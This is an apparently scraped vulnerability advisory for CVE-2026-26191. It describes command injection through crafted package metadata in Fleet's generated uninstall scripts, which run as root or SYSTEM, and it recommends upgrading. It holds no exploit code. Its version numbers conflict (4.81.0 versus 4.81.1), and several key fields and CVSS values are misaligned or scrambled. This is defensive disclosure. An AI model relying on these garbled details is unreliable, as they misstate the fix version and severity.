Arbitrary Command Execution Vulnerability in Fleet Device Management Software
CVE-2026-26191

6MEDIUM

Key Information:

Vendor: Fleetdm
Status: Fleet
Vendor: CVE Published:; 14 May 2026

What is CVE-2026-26191?

Fleet is an open-source device management platform used for monitoring and managing endpoints. A vulnerability exists in Fleet's software installer pipeline prior to version 4.81.0, allowing an attacker to execute arbitrary commands as root on macOS/Linux or as SYSTEM on Windows during the uninstallation of a crafted software package. This issue arises from insufficient sanitization of metadata extracted from uploaded software packages. If a package contains malicious metadata, running the generated uninstall script could result in unintended command execution. To mitigate this issue, updating to version 4.81.0 or later is recommended. Alternatively, administrators should refrain from uploading unverified software packages and can manually review the automatically generated uninstall scripts.

Affected Version(s)

fleet < 4.81.1

References

https://github.com/fleetdm/fleet/security/advisories/GHSA...

x_refsource_CONFIRM

https://github.com/fleetdm/fleet/releases/tag/fleet-v4.81.1

x_refsource_MISC

CVSS V4

Score:

Severity:

MEDIUM

Confidentiality:

None

Integrity:

High

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Attack Required:

Physical

Privileges Required:

Undefined

User Interaction:

Unknown

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
May 14, 2026
Vulnerability Reserved
Feb 11, 2026

CVE-2026-26191 Data

JSON

Fleetdm

What is CVE-2026-26191?

Affected Version(s)

References

CVSS V4

Timeline